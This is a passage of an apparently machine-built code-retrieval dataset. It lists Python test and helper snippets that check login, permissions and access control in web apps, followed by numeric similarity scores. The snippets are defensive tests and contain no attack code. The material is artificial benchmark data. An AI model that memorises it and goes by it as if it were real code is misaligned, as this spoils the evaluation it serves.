testapp.get('/category/1')", "def test_admin_can_login_to_web_portal(admin):", "def is_logged_in():\n return 'user' in session", "def test_journal_route_accessible_only_if_logged_in(self):\n response = self.client.get(reverse_lazy('journal'))\n self.assertEqual(response.status_code, 302)", "def user_in_session():\n return 'user_id' in login_session", "def test_dashboard_not_signed(self):\n views_url = ('/dashboard/',\n '/accounts/picture/')\n #create a get request\n for view in views_url:\n response = self.client.get(view)\n #the user was not logged in, the user should be redirected\n self.assertEqual(response.status_code, 302,\n msg=str(response.request))", "def test_func(self):\n return self.request.user.is_superuser", "def test_logged_user_can_access(self):\n\n utils.create_user_and_authenticate(self)\n utils.test_can_access(self, self.url)", "def test_anonymous(self):\n self.logout_user()\n\n response = self.client.get(self.api_link)\n self.assertContains(response, \"sign in to use private threads\", status_code=403)", "def test_not_logged_in(self):\n\n # test show album\n self.perm_escalate_helper(self.albumcontrol, self.showalbumrequest, self.testalbum, self.testalbum.id,\n AnonymousUser(), album.display_album, ALBUM_PUBLIC)\n\n # test photo view\n self.perm_escalate_helper_get_with_client(self.albumcontrol, self.testalbum, self.photo.id,\n \"photoid\", \"show_photo\", ALBUM_PUBLIC)\n\n # test individual photo view page\n self.perm_escalate_helper(self.albumcontrol, self.indivphotorequest, self.testalbum, self.photo.id,\n AnonymousUser(), album.display_photo, ALBUM_PUBLIC)", "def test_func(self):\n return self.request.user.has_permission(\"core.view_staffer\")", "def test_signin_page_bypass(self):\r\n # Test that they do signin if they don't have a cert\r\n response = self.client.get(reverse('signin_user'))\r\n self.assertEqual(200, response.status_code)\r\n self.assertTrue('login_form' in response.content\r\n or 'login-form' in response.content)\r\n\r\n # And get directly logged in otherwise\r\n response = self.client.get(\r\n reverse('signin_user'), follow=True,\r\n SSL_CLIENT_S_DN=self.AUTH_DN.format(self.USER_NAME, self.USER_EMAIL))\r\n self.assertEquals(('http://testserver/dashboard', 302),\r\n response.redirect_chain[-1])\r\n self.assertIn(SESSION_KEY, self.client.session)", "def test_authentication_is_not_required(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def is_allowed_to_submit(request):\n return not settings.REQUIRE_LOGIN or request.user.is_authenticated()", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test__user_passed_as_none(self):\r\n access.has_access(None, 'staff', 'global', None)", "def assert_cannot_view(obj):\n selenium_utils.open_url(obj.url)\n assert ui_utils.is_error_403()", "def test_unauthenticated_resource_allowed(self):\n raise NotImplementedError # FIXME", "def test_private_pages_auth(self):\r\n auth_pages = (\r\n '/course/',\r\n )\r\n\r\n # These are pages that should just load when the user is logged in\r\n # (no data needed)\r\n simple_auth_pages = (\r\n '/course/',\r\n )\r\n\r\n # need an activated user\r\n self.test_create_account()\r\n\r\n # Create a new session\r\n self.client = AjaxEnabledTestClient()\r\n\r\n # Not logged in. Should redirect to login.\r\n print('Not logged in')\r\n for page in auth_pages:\r\n print(\"Checking '{0}'\".format(page))\r\n self.check_page_get(page, expected=302)\r\n\r\n # Logged in should work.\r\n self.login(self.email, self.pw)\r\n\r\n print('Logged in')\r\n for page in simple_auth_pages:\r\n print(\"Checking '{0}'\".format(page))\r\n self.check_page_get(page, expected=200)", "def test_registration_page_bypass(self):\r\n response = self.client.get(\r\n reverse('register_user'), follow=True,\r\n SSL_CLIENT_S_DN=self.AUTH_DN.format(self.USER_NAME, self.USER_EMAIL))\r\n self.assertEquals(('http://testserver/dashboard', 302),\r\n response.redirect_chain[-1])\r\n self.assertIn(SESSION_KEY, self.client.session)", "def test_homepage_logged_in_except(self):\r\n\r\n u1 = User.query.filter_by(username='testuser').one()\r\n u1.location = 'US-FAKE'\r\n db.session.add(u1)\r\n db.session.commit()\r\n\r\n with self.client as c:\r\n with c.session_transaction() as sess:\r\n sess[CURR_USER_KEY] = u1.id\r\n response = c.get('/')\r\n self.assertEqual(response.status_code, 200)\r\n self.assertIn(b'No data found for your region.', response.data)", "def test_instructor_page_access_nonstaff(self):\r\n self.login(self.enrolled_user)\r\n\r\n urls = [reverse('instructor_dashboard', kwargs={'course_id': self.course.id.to_deprecated_string()}),\r\n reverse('instructor_dashboard', kwargs={'course_id': self.test_course.id.to_deprecated_string()})]\r\n\r\n # Shouldn't be able to get to the instructor pages\r\n for url in urls:\r\n check_for_get_code(self, 404, url)", "def test_shred_login():\n assert_redirect_to_login('/shred/')\n assert_not_redirect_to_login('/shred/')", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def require_login(self):\n\tif users.get_current_user():\n\t return True\n\telse:\n\t self.redirect(users.create_login_url(self.request.uri))\n\t return False", "def test_get_main_page_without_logged_in_user(self):\n response = self.testapp.get('/')\n self.assertEqual(response.status_int, 200)", "def test_aio_can_login_to_web_portal(aio):", "def before_request() -> None:\n if current_user.is_anonymous() or not current_user.is_allowed():\n abort(401)", "def test_func(self):\n return self.request.user.is_active # any active user", "def test_page_view_permission(self):\n \n adminonlypage = create_page_in_admin(self.testproject,\"adminonlypage\",\n permission_lvl=Page.ADMIN_ONLY) \n registeredonlypage = create_page_in_admin(self.testproject,\"registeredonlypage\",\n permission_lvl=Page.REGISTERED_ONLY)\n publicpage = create_page_in_admin(self.testproject,\"publicpage\",\n permission_lvl=Page.ALL)\n \n self._test_page_can_be_viewed(self.projectadmin,adminonlypage)\n self._test_page_can_not_be_viewed(self.participant,adminonlypage)\n self._test_page_can_not_be_viewed(self.registered_user,adminonlypage) \n self._test_page_can_not_be_viewed(None,adminonlypage) # None = not logged in\n \n self._test_page_can_be_viewed(self.projectadmin,registeredonlypage)\n self._test_page_can_be_viewed(self.participant,registeredonlypage)\n self._test_page_can_not_be_viewed(self.registered_user,registeredonlypage)\n self._test_page_can_not_be_viewed(None,registeredonlypage) # None = not logged in\n \n self._test_page_can_be_viewed(self.projectadmin,publicpage)\n self._test_page_can_be_viewed(self.participant,publicpage)\n self._test_page_can_be_viewed(self.registered_user,publicpage)\n self._test_page_can_be_viewed(None,publicpage) # None = not logged in", "def logged_in(request):\n return request.current_user is not None", "def test_not_logged_cannot_create_tab(self):\n\n utils.test_not_logged_cannot_access(self, self.url, self.data)", "def test_user_isnt_admin():\n app = create_ctfd()\n with app.app_context():\n register_user(app)\n client = login_as_user(app)\n for page in ['pages', 'teams', 'scoreboard', 'chals', 'statistics', 'config']:\n r = client.get('/admin/{}'.format(page))\n assert r.location.startswith(\"http://localhost/login?next=\")\n assert r.status_code == 302\n destroy_ctfd(app)", "def test_01_front_page(self):\r\n url = '/'\r\n # As Anonymou user\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should not be shown to anonymous users\"\r\n assert dom.find(id='top_users') is None, err_msg\r\n # As Authenticated user but NOT ADMIN\r\n self.signin()\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should not be shown to authenticated users\"\r\n assert dom.find(id='top_users') is None, err_msg\r\n self.signout\r\n # As Authenticated user but ADMIN\r\n res = self.signin(email=self.root_addr, password=self.root_password)\r\n print res.data\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to admin\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n self.signout()", "def logged_in(self):\n return self.auth.get_user_by_session() is not None", "def deny_access():\n flash('You must login first.')\n return redirect(url_for('home'))", "def test_logged_in_not_friend(self):\n\n # log in\n self.make_logged_in_not_friend()\n\n # test show album\n self.perm_escalate_helper(self.albumcontrol, self.showalbumrequest, self.testalbum, self.testalbum.id,\n self.u2, album.display_album, ALBUM_PUBLIC)\n\n # test photo view\n self.perm_escalate_helper_get_with_client(self.albumcontrol, self.testalbum, self.photo.id,\n \"photoid\", \"show_photo\", ALBUM_PUBLIC)\n\n # test individual photo view page\n self.perm_escalate_helper(self.albumcontrol, self.indivphotorequest, self.testalbum, self.photo.id,\n self.u2, album.display_photo, ALBUM_PUBLIC)", "def test_returns_403_if_user_doesnt_have_PM_role(self):\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n )\n self.assertEqual(response.status_code, 403)", "def test_returns_403_if_user_doesnt_have_PM_role(self):\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n )\n self.assertEqual(response.status_code, 403)", "def test_returns_403_if_user_doesnt_have_PM_role(self):\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n )\n self.assertEqual(response.status_code, 403)", "def test_logged_user_can_access(self):\n\n utils.create_user_and_authenticate(self)\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def is_logged_in(session):\n return 'user' in session", "def validate_login(self, request):\n\n if 'id' not in request.session or 'steam_id' not in request.session:\n raise PermissionDenied('You need to login')\n\n # if self.mode9:\n # if 'team' not in PlayerList[request.session['id']]:\n # raise PermissionDenied('Player is not in a team!')", "def test_01_front_page(self):\r\n url = '/'\r\n # As Anonymou user\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to anonymous users\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n # As Authenticated user but NOT ADMIN\r\n self.signin()\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to authenticated users\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n self.signout\r\n # As Authenticated user but ADMIN\r\n self.signin(email=self.root_addr, password=self.root_password)\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to admin\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n self.signout()", "def login_web_required(view_func):\r\n @wraps(view_func, assigned=available_attrs(view_func))\r\n def _wrapped_view_func(request, *args, **kwargs):\r\n if hasattr(request, \"session\") and request.session.get('is_logon', False) and request.user.is_active:\r\n return view_func(request, *args, **kwargs)\r\n else:\r\n return HttpResponse(FailResponse(u'请先登录'))\r\n return _wrapped_view_func", "def test_if_an_user_c_access_administration_panel(client):\n response = client.get(\"/admin/\")\n assert response.status_code != 200", "def testDenyAllowAccess(self):\n self.host.ContinueAuth()\n self.host.SignIn(self.account['username'], self.account['password'])\n self.host.DenyAccess()\n self.host.ContinueAuth()\n self.host.AllowAccess()", "def test_no_redirect(self):\n self.create_user_and_login(\n agreed_to_terms_of_service=True,\n filled_out=True\n )\n\n resp = self.client.get(DASHBOARD_URL)\n assert resp.status_code == 200", "def __require_privilaged_access(self):\n if not self.getLoggedInUser():\n raise codechecker_api_shared.ttypes.RequestFailed(\n codechecker_api_shared.ttypes.ErrorCode.UNAUTHORIZED,\n \"The server must be start by using privilaged access to \"\n \"execute this action.\")", "def test_no_access_without_login(self):\n response = self.client.get(reverse('question_list'), follow=True)\n expected_url = reverse('home') + \"?next=\" + reverse('question_list')\n self.assertRedirects(response, expected_url, status_code=302, \n target_status_code=200)\n expected_url = reverse('home') + \"?next=\" + reverse('question_add')\n response = self.client.get(reverse('question_add'), follow=True)\n self.assertRedirects(response, expected_url, status_code=302, \n target_status_code=200)", "def test_assessor_access_limited(self):\n assessor = get_or_create_default_assessor()\n self.client.login(assessor.email)\n # This assessor doesn't belong to a group\n self.assertTrue(is_assessor(assessor))\n self.assertFalse(get_user_assessor_groups(assessor))\n\n # forbidden\n urls_get_forbidden = [\n reverse('wl_applications:enter_conditions', args=[self.application.pk]),\n reverse('wl_applications:enter_conditions_assessor', args=[self.application.pk, self.assessment.pk]),\n ]\n urls_post_forbidden = [\n {\n 'url': reverse('wl_applications:create_condition', args=[self.application.pk]),\n 'data': {\n 'code': '123488374',\n 'text': 'condition text'\n }\n },\n {\n 'url': reverse('wl_applications:set_assessment_condition_state'),\n 'data': {\n 'assessmentConditionID': self.assessment_condition.pk,\n 'acceptanceStatus': 'accepted',\n }\n },\n {\n 'url': reverse('wl_applications:enter_conditions', args=[self.application.pk]),\n 'data': {\n 'conditionID': [self.condition.pk],\n }\n },\n {\n 'url': reverse('wl_applications:enter_conditions_assessor',\n args=[self.application.pk, self.assessment.pk]),\n 'data': {\n 'conditionID': [self.condition.pk],\n }\n },\n ]\n # Allowed\n urls_get_allowed = [\n reverse('wl_applications:search_conditions')\n ]\n urls_post_allowed = [\n ]\n for url in urls_get_forbidden:\n response = self.client.get(url, follow=True)\n if response.status_code != 403:\n self.assertRedirects(response, reverse('wl_dashboard:tables_assessor'), status_code=302,\n target_status_code=200)\n for url in urls_post_forbidden:\n response = self.client.post(url['url'], url['data'], follow=True)\n if response.status_code != 403:\n self.assertRedirects(response, reverse('wl_dashboard:tables_assessor'), status_code=302,\n target_status_code=200)\n for url in urls_get_allowed:\n response = self.client.get(url, follow=True)\n self.assertEqual(200, response.status_code)\n\n for url in urls_post_allowed:\n response = self.client.post(url['url'], url['data'], follow=True)\n self.assertEqual(200, response.status_code)", "def test_webdriver_not_authenticated(live_server, env_browser):\n browser = env_browser\n browser.get(flask.url_for(\"security.change_password\", _external=True))\n assert flask.url_for(\"security.login\", _external=True) in browser.current_url", "def test_login_required(self):\n res = self.client.get(INGREDIENTS_URL)\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)", "def test_not_logged_user_cannot_leave(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def session_required(view):\n def validation(*args, **kwargs):\n request = args[0]\n if request.session.get('email', None):\n return view(*args, **kwargs)\n else:\n return HttpResponseForbidden('403 Forbbiden, You have to login first to use this amazing app')\n return validation", "def test_login_required():\n pass", "def is_impersonated_session(request):\n return (\n hasattr(request, \"session\") and la_settings.USER_SESSION_FLAG in request.session\n )", "def test_not_logged_cannot_delete(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_authenticated(self):\n response = self.client.get(telemetry_url)\n self.assertEqual(403, response.status_code)", "def test_00_anonymous(self):\r\n res = self.app.get(self.url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"The CKAN exporter should not be available for anon users\"\r\n assert dom.find(id=\"ckan\") is None, err_msg", "def test_token(self):\n api_response = requests.get(self.api_config.get_api_url() + \"greetings/isloggedin\",\n headers={\"Authorization\": \"Bearer \" + self.API_TOKEN})\n\n if api_response.status_code == 401 or 403:\n return False\n else:\n return True", "def test_auth_public_unowned(self):\n self.do_visible(True, 'pattieblack', True, tenant='froggy')", "def test_anonymous_user(self):\r\n self.request.user = AnonymousUser()\r\n context = user_has_cart_context_processor(self.request)\r\n self.assertFalse(context['display_shopping_cart'])", "def test_if_forbiden_for_authenticated_permissions(self):\r\n res = self.client_authenticated.get(reverse(LIST_USER_URL),data={})\r\n self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)" ]
[ "0.7482324", "0.7440397", "0.7440397", "0.7440397", "0.7440397", "0.7383309", "0.707093", "0.7003852", "0.6998608", "0.6921593", "0.68799853", "0.6807848", "0.6807848", "0.6783388", "0.67709535", "0.6742237", "0.67224073", "0.6720221", "0.6720221", "0.6720221", "0.669822", "0.6676338", "0.66504043", "0.66504043", "0.66504043", "0.66504043", "0.6645153", "0.6621275", "0.6596097", "0.65860206", "0.65636677", "0.6563315", "0.65596586", "0.6552794", "0.654565", "0.6538141", "0.65232", "0.65230846", "0.64935756", "0.64922774", "0.6478924", "0.64678633", "0.64616287", "0.6456271", "0.64519906", "0.64479584", "0.64479584", "0.64479584", "0.64479584", "0.6427748", "0.64264274", "0.642532", "0.6423111", "0.6422225", "0.6415429", "0.6408262", "0.64079136", "0.6407329", "0.6407329", "0.6407329", "0.6407329", "0.6403552", "0.64012057", "0.6392876", "0.637878", "0.63746595", "0.6374236", "0.6370098", "0.6366382", "0.63659036", "0.6360152", "0.6347357", "0.63405573", "0.6336323", "0.6321056", "0.6321056", "0.6321056", "0.63066447", "0.6301901", "0.63009095", "0.6291129", "0.628317", "0.62816125", "0.6281249", "0.6279987", "0.62748647", "0.6274433", "0.6273688", "0.62682015", "0.62535775", "0.6251592", "0.6247027", "0.62462574", "0.6243556", "0.62421054", "0.62303126", "0.6225438", "0.62207896", "0.62184554", "0.6217577", "0.6213295" ]
0.0
-1
Test user's if favourite restaurant is added to DB
def test_add_to_fav_(self): result = self.client.post("/add_to_fav", data={"yelp_biz_id":"JA_V9TqDCrkgknqrcUndIQ", "yelp_rest_name":"Siam", "yelp_rating":"4", "yelp_category":"Thai", "yelp_price":"$$", "yelp_image_url":"https://s3-media2.fl.yelpcdn.com/bphoto/1SkZwZrRZkQSzRMn_Trs3w/o.jpg" }) DB_result = Restaurant_details.query.filter_by(biz_id = "JA_V9TqDCrkgknqrcUndIQ").first() self.assertIsNotNone(DB_result) #testing that the returned result is not NONE self.assertEqual(DB_result.restaurant_name, 'Siam') #testing restaurant name is what it should be self.assertIn(b"Your Favourite has been saved", result.data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_Favourite(self):\n self.assertEquals(self.fav_1.pk, 1)\n self.assertEquals(self.fav_1.date_added, '2019-12-20 09:00:00')\n self.assertEquals(self.fav_1.user.pk, 1)\n self.assertEquals(self.fav_1.product.pk, 1)", "async def create(self, favorite: Favorite) -> Favorite:", "def test_get(self, init_db, favorite):\n assert Favorite.get(favorite.id) == favorite", "def favorite(user, wine):\n\n favorite = Favorite(user=user, wine=wine)\n\n db.session.add(favorite)\n db.session.commit()\n\n # return favorite", "def update_favorites():\n\n check_favorite = Favorite.query.filter(Favorite.favorited_item==session[\"athlete_id\"]).first()\n route = f'/athletes/{session[\"athlete_id\"]}'\n\n if check_favorite is None:\n new_update = Favorite(id=current_user.id, favorited_item=session[\"athlete_id\"])\n db.session.add(new_update) \n \n else:\n db.session.delete(check_favorite)\n \n db.session.commit()\n \n return redirect(route)", "def test_user_model(self):\n\n u = User(\n email=\"[email protected]\",\n username=\"testuser\",\n password=\"HASHED_PASSWORD\",\n phone_number=None,\n image_url=None,\n )\n\n db.session.add(u)\n db.session.commit()\n\n self.assertEqual(len(u.favorites), 0)", "def insert_in_favourite(self, food_id, substitute_id):\n\n ref = (food_id, substitute_id)\n print(\"\"\"\\n Souhaitez-vous ajouter cette recherche dans vos favoris ?\n 1. Oui\n 0. Non \"\"\")\n\n choice = int(input(\"Entrez votre choix: \\n\"))\n if choice == 1:\n self.cursor.execute(\"\"\"INSERT INTO favourite\n (food_id, substitute_id)\n VALUES (%s, %s)\"\"\", ref)\n else:\n return", "def add_favourite(recipe_id):\r\n if \"user\" in session:\r\n user = coll_users.find_one(\r\n {\"username_lower\": session[\"user\"]})[\"_id\"]\r\n coll_users.update_one(\r\n {\"_id\": ObjectId(user)},\r\n {\"$push\": {\"user_favs\": ObjectId(recipe_id)}})\r\n coll_recipes.update(\r\n {\"_id\": ObjectId(recipe_id)}, {\"$inc\": {\"favourites\": 1}})\r\n return redirect(url_for(\r\n \"recipes.recipe_detail\",\r\n recipe_id=recipe_id))\r\n else:\r\n flash(\"You must be logged in to perform that action!\")\r\n return redirect(url_for(\"users.login\"))", "def favourite():\n\n # user is adding or deleting a favourite\n if request.method == \"POST\":\n\n # user is adding a station from 'stations.html'\n if request.form.get(\"add\"):\n\n # max limit of 5 favourites per user\n if len(Favourite.query.filter(Favourite.user_id==session[\"user_id\"]).all()) > 4:\n\n return redirect(url_for(\"stations\", error=\"limit\"))\n\n # remember id of station to add\n station_id = request.form.get(\"add\")\n\n # check user hasn't already favourited station\n if(Favourite.query.filter(Favourite.user_id==session[\"user_id\"],Favourite.station_id==station_id).first()):\n\n return redirect(url_for(\"stations\", error=\"taken\"))\n\n # add favourite to db for user\n addFav = Favourite(user_id=session[\"user_id\"],station_id=station_id)\n db.session.add(addFav)\n db.session.commit()\n\n return redirect(url_for(\"stations\", success=True))\n\n # user is deleting a station from 'favourites.html'\n elif request.form.get(\"delete\"):\n\n station_id = request.form.get(\"delete\")\n\n delFav = Favourite.query.filter(Favourite.user_id==session[\"user_id\"],Favourite.station_id==station_id).first()\n db.session.delete(delFav)\n db.session.commit()\n\n return redirect(url_for(\"favourite\", deleted=True))\n\n # user is viewing favourites via GET\n else:\n favourites = Favourite.query.filter(Favourite.user_id==session[\"user_id\"]).all()\n\n return render_template(\"favourites.html\", username=get_username(), favourites=favourites)", "def add_favorite(request):\n print(\"La fonction pour ajouté un produit est appelé\")\n query = request.GET.get('_substitute_product','')\n print(query)\n # query_favorite = query.id\n query_name = Product.objects.get(name=query)\n print(query_name)\n print(\"ID DU PRODUIT\")\n username = request.user\n user_id = request.user.id\n # user = User.objects.get(id=username)\n print(username)\n print(\"ID DE L'USER\")\n if query_name is not None:\n try: \n UserFavorite.objects.get(user_name=username, product=query_name)\n print(\"Ce produit est déjà dans vos favoris.\")\n except ObjectDoesNotExist:\n new_favorite = UserFavorite.objects.create(user_name=username,product=query_name)\n new_favorite.save()\n print(\"Le produit a bien été enregistré.\")\n else:\n pass\n return redirect('favorits')\n # return render(request,'index.html')", "def add_visit():\n\n # checks to see if user is logged in\n\n if session.get('username'):\n username = session['username']\n user = User.query.filter_by(username=username).first()\n\n # finds the friend searched for on the database\n friend = request.args.get(\"friend\")\n friend_user = User.query.filter_by(username=friend).first()\n\n when = request.args.get(\"when\")\n user_rating = Decimal(request.args.get(\"rating\"))\n\n # finds the restaurant's ID, adds the restaurant to the database if not in yet\n restaurant = request.args.get(\"name\")\n yelp_id = request.args.get(\"id\")\n avg_rating = request.args.get(\"avg_rating\")\n price_lvl = request.args.get(\"price\")\n review_count = request.args.get(\"rc\")\n categs = request.args.get(\"categs\")\n list_categs = categs.split(\",\")\n\n if not Restaurant.query.filter_by(name=restaurant).all():\n new_restaurant = Restaurant(yelp_id=yelp_id,\n name=restaurant,\n rating=avg_rating,\n price=turn_to_nums(price_lvl),\n review_count=review_count)\n db.session.add(new_restaurant)\n db.session.commit()\n\n rest_id = db.session.query(Restaurant.id).filter_by(yelp_id=yelp_id).first()[0]\n if not Category.query.filter_by(rest_id=rest_id).all():\n if len(list_categs) == 3:\n categ1, categ2, categ3 = list_categs\n elif len(list_categs) == 2:\n categ1, categ2 = list_categs\n categ3 = None\n else:\n categ1 = list_categs\n categ2 = None\n categ3 = None\n new_categs = Category(rest_id=rest_id,\n categ1=categ1,\n categ2=categ2,\n categ3=categ3)\n db.session.add(new_categs)\n db.session.commit()\n\n # Adding to the visits and uservisits tables\n new_visit = Visit(rest_id=rest_id, date=when)\n db.session.add(new_visit)\n db.session.commit()\n new_visit_id = db.session.query(Visit.id).filter_by(rest_id=rest_id,\n date=when).order_by(Visit.date.desc()).first()[0]\n new_visit_exp = UserExp(visit_id=new_visit_id,\n user_id=user.id,\n rating=user_rating)\n f_new_visit_exp = UserExp(visit_id=new_visit_id,\n user_id=friend_user.id)\n db.session.add(new_visit_exp)\n db.session.add(f_new_visit_exp)\n db.session.commit()\n return \" <span class='label label-success'>Saved!</span>\"\n\n # if not logged in, cannot save\n else:\n return \" <a href='/login'><span class='label label-default'>Login to save</span></a>\"", "def save_to_favorites_list():\n\n #get show id from the event handler/post request\n show_id = str(request.form.get(\"id\"))\n #get button content from the event handler/post request\n button_content = request.form.get(\"button_content\")\n\n button_content_encoded = button_content.encode('utf-8')\n\n #save utf-8 encoded checkmark as a string variable\n check_mark = \"\\xe2\\x9c\\x93\"\n\n #find the current logged in user\n email = session.get(\"current_user\")\n\n if email:\n\n #use email to find the user_id\n user_id = User.find_user_id_with_email(email)\n\n #if the show has not been favorited yet\n if check_mark not in button_content_encoded:\n #add row in favorites table\n favorite = Favorite.add_to_favorites(show_id, user_id)\n\n #pass back the show_id and that the show has been favorited\n payload = {\"show_id\":show_id,\"favorite\":\"True\"}\n return jsonify(payload)\n else:\n #delete row in favorites table\n Favorite.delete_favorite(show_id)\n\n #pass back the show_id and that the show has been unfavorited\n payload = {\"show_id\":show_id,\"favorite\":\"False\"}\n return jsonify(payload)\n else:\n flash(\"You need to be logged in to see that page.\")\n return redirect(\"/login\")", "def test_save(self, init_db, category1):\n params = {\n 'title' : fake.alphanumeric(15),\n 'description' : fake.alphanumeric(200),\n 'ranking' : 1,\n 'meta_data' : {\n 'color' : 'red',\n 'quantity' : 2,\n 'date_purchased' : '2019-02-05',\n 'condition' : 'bad'\n },\n 'category_id' : category1.id\n }\n\n favorite = Favorite(**params)\n assert favorite == favorite.save()", "def insert_favorite_food(self, user_answer_id_food, name_substitute):\n self.cursor = self.data_base.cursor(MySQLCursorPrepared)\n save_favorite_food = \"\"\"INSERT INTO Favorite\n (id_food, id_substitute_chooses)\n VALUES({0}, \n (SELECT id FROM Food WHERE name_food = {1}))\"\"\" \\\n .format(int(user_answer_id_food),\n \"\\'\" + name_substitute + \"\\'\")\n self.cursor.execute(save_favorite_food)\n self.data_base.commit()", "def favorite():\n # handle pre-flight for browsers CORS access\n if request.method == \"OPTIONS\":\n return generate_response()\n # part1: verify the token\n checked_and_verified, response = check_verify_token(request,login_session)\n if checked_and_verified == False: return response\n # handle the edge case where user is authorized to perform create user but not other method\n if not is_loggedin(login_session):\n response = generate_message(MESSAGE_USER_NOT_LOGGED_IN,401)\n return response\n # handles the get request\n if request.method == \"GET\":\n favorites = read_criteria(Favorite,{\"user_id\":login_session[\"user_id\"]},session,\"m\") or []\n favorites_room_json = [room_json(favorite.room, session,app.config[\"OFFLINE_TESTING\"], login_session) for favorite in favorites]\n return generate_response(elem={\"favorites\":favorites_room_json})\n # part2: check json, handle POST request\n checked_json, response, requested_json = check_json_form(request,MESSAGE_BAD_JSON,MESSAGE_GET_FAV_NO_JSON)\n if checked_json != True: return response\n # verify room id type, with strict mode\n requested_json[\"user_id\"] = login_session[\"user_id\"]\n correct_format,valid_update_pairs, response = process_request_json(Favorite,requested_json, True, access_mode=\"read\",nondb_type_map={\"action\":str})\n if correct_format == False: \n return response\n room = get_row_if_exists(Room, session, ** {\"id\": requested_json[\"room_id\"]})\n user = get_row_if_exists(User, session, ** {\"id\": login_session[\"user_id\"]})\n # if the room id in the request doesn't fit any entry in db, return error message\n if room is None:\n response = generate_message(MESSAGE_FAV_ROOM_NOT_EXIST,404)\n return response\n if requested_json[\"action\"] == \"add\":\n # the add favorite already handle duplicates add\n # it treats multiple adds as one add and every duplicate add afterwards is counted as success\n add_favorite(room,user, session)\n response = generate_message(MESSAGE_POST_FAV_ADD_SUCCESS,201)\n return response\n elif requested_json[\"action\"] == \"delete\":\n # the delete favorite already handle duplicates delete\n # it treats multiple delete as one delete and every duplicate delete afterwards is counted as success\n remove_entry(Favorite,requested_json[\"room_id\"], session)\n response = generate_message(MESSAGE_POST_FAV_DEL_SUCCESS,200)\n return response\n else: # method not supported\n response = generate_message(MESSAGE_POST_FAV_METHOD_NOT_SUPPORTED,405)\n return response", "def test_display_favorite(self):\n\n result = self.client.get(\"/view_favorites\")\n self.assertIn(b\"s1925148\", result.data)", "def add_to_fav(show_id, name):\n db = get_db()\n db.execute(\n 'INSERT INTO shows_users (show_id, user_id)'\n ' VALUES (?, ?)',\n (show_id, session['user_id'])\n )\n\n flash('\\\"%s\\\" has been successfully added to your favourite TV Shows!' % name)\n db.commit()\n return redirect(request.referrer)", "def favourite_create(self, data, sesh):\n\n\t\t# Verify fields\n\t\ttry: DictHelper.eval(data, ['id'])\n\t\texcept ValueError as e: return Services.Effect(error=(1001, [(f, \"missing\") for f in e.args]))\n\n\t\t# If someone tries to add themselves\n\t\tif data['id'] == sesh['thrower']['_id']:\n\t\t\treturn Services.Effect(False);\n\n\t\t# Make sure the thrower exists\n\t\tif not Thrower.exists(data['id']):\n\t\t\treturn Services.Effect(error=(1104, data['id']))\n\n\t\t# Add the thrower to the logged in thrower's favourites and return the\n\t\t#\tresult\n\t\treturn Services.Effect(\n\t\t\tFavourites.add(sesh['thrower']['_id'], data['id'])\n\t\t)", "def testing_favourites(self, email, password, song):\n add_to_favourites = Favourites(self.driver, email, password, song)\n add_to_favourites.open_login_page()\n add_to_favourites.set_user_inputs()\n add_to_favourites.open_home_page()\n add_to_favourites.selecting_a_random_song()\n assert add_to_favourites.check_the_song_is_displayed() is True, 'Song is not displaying'\n add_to_favourites.add_to_wishlist()\n add_to_favourites.go_to_favourites_page()\n assert add_to_favourites.check_the_song_is_added_to_wishlist() == song, 'Not the song'", "def add_testing_site():\n\n test_id = request.form.get('test_id')\n favorite = { \n 'status': None,\n }\n try:\n if 'user_id' in session:\n user_id = 